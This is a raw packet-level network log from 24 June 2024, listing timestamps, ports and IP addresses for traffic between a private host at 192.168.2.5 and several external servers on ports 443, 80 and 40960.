Jun 24, 2024 00:10:16.357443094 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.357497931 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.357523918 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.357688904 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.357703924 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.358227968 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.358428955 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.358443975 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.358488083 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.360655069 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.444451094 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.444638968 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.444655895 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.444700003 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.444740057 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.444767952 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.444902897 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.444921970 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.448930025 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.448945999 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.449317932 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.452409983 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.452523947 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.452558994 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.452641010 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.452703953 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.452742100 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.452759027 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.452836037 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.453531027 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.453660011 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.460242987 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.460366011 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.521927118 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:16.521985054 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:16.522865057 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:16.527592897 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:16.533041000 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.533108950 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.533152103 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.533200979 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.533226013 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.533278942 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.533297062 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.533360004 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.533374071 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.533425093 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.534147978 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.534204006 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.534219027 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.534269094 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.534281969 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.534342051 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.535209894 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.535264015 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.535276890 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.535381079 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.535389900 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.535403967 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.535444021 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.535469055 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.536123037 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.536180973 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541137934 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541203976 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541218996 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541273117 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541285992 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541340113 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541352034 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541408062 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541639090 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541698933 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541711092 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541766882 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.541781902 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.541837931 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.542155981 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.542215109 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.542227030 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.542278051 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.542290926 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.542345047 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.542357922 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.542407990 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.622819901 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.622855902 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.622881889 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.622936964 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.622970104 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.622998953 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.623023033 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.624356985 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.624386072 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.624437094 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.624454021 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.624499083 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.624526024 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.630333900 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.630357027 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.630414009 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.630429983 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.630458117 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.630477905 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.631019115 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.631037951 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.631094933 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.631109953 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.631139994 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.631162882 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.711642027 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.711673021 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.711730957 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.711764097 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.711793900 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.711859941 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.712769985 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.712791920 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.712863922 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.712882042 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.712908030 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.712925911 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.715747118 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:16.715801954 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:16.718446016 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.718480110 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.718523979 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.718549967 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.718583107 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.718583107 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.718610048 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.718632936 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.727768898 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.727812052 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.893704891 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.893778086 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.893824100 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.893845081 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:17.156786919 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:17.161798954 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:17.391242981 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:17.392410994 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:17.396776915 CEST	80	49712	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:17.396867037 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:17.397327900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:17.397408962 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:17.400356054 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:17.405149937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:17.426680088 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:17.426732063 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:17.426820993 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:17.438045025 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:17.438057899 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:17.447042942 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:17.453039885 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:17.457904100 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:17.743386030 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:17.793420076 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:18.012553930 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:18.017460108 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.111778021 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.111850977 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.118319988 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.123070002 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.305094004 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.309242010 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:18.314117908 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.332705021 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.332865953 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.338529110 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338547945 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338563919 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338579893 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338653088 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338677883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338676929 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338676929 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338692904 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338705063 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338777065 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338790894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338805914 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338805914 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338824034 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.338829994 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338891029 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.338891029 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.343751907 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.343777895 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.343868971 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.343868971 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.468252897 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468275070 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468296051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468359947 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468373060 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468389988 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.468389988 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.468513012 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.468703032 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.468746901 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.469058037 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469108105 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.469259977 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469274998 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469424963 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469448090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469531059 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.469618082 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469631910 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469647884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469657898 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.469697952 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.469779968 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.469974041 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.470000982 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.470012903 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.470890045 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.470906019 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.470921993 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.470932007 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.470936060 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.470957994 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.470980883 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.471051931 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.471090078 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.471604109 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.471618891 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.471647024 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.471671104 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.471762896 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.471803904 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.554464102 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.554497004 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.554972887 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.555047035 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.560802937 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.594302893 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594322920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594338894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594397068 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.594444036 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594459057 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594465017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.594474077 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594502926 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.594537973 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.594810009 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.594855070 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.594988108 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595027924 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.595037937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595055103 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595068932 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595077991 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.595114946 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.595786095 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595841885 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.595942020 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595963001 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595978975 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.595985889 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.595993996 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596021891 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.596055984 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.596658945 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596673965 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596709013 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.596730947 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.596815109 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596829891 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596844912 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.596857071 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.596878052 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.597630024 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.597644091 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.597659111 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.597677946 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.597718954 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.597789049 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.597803116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.597826958 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.597857952 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.598337889 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.598383904 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.598489046 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.598504066 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.598520041 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.598570108 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.598639011 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.598706007 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.599445105 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.599461079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.599476099 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.599495888 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.599519968 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.599610090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.599623919 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.599673986 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.600290060 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.600303888 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.600318909 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.600326061 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.600336075 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.600372076 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.600471020 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.600495100 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.600514889 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.600550890 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.601121902 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.601171017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.603089094 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.608500004 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.616175890 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:18.625325918 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.678649902 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678664923 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678745985 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.678766966 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678781033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678803921 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678813934 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.678819895 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.678853989 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.678885937 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.679136992 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.679150105 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.679184914 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.679207087 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.679271936 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.679316044 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.679321051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.679364920 CEST	49723	80	192.168.2.5	77.91.77.81
